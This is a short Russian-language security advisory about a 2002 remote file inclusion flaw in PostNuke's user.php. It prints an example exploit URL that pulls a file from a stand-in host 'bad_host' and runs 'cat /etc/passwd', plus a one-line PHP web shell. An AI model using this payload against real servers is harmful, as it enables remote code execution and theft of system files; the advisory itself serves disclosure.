Выполнение произвольного кода в PostNuke

Дата публикации:
01.04.2002
Всего просмотров:
718
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

PostNuke - система управления содержанием, осуществленная в php, и доступная для Windows и Linux.

Возможно вынудить сценарий user.php включать произвольные модули. Эти файлы могут быть включены удаленно и содержать произвольный код, который будет выполнен уязвимой системой.

Пример: http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host &command=cat%20/etc/passwd

Где bad_file.txt:
<pre>
<?php
system($command);
?>

 



Ссылки: Источник
или введите имя

CAPTCHA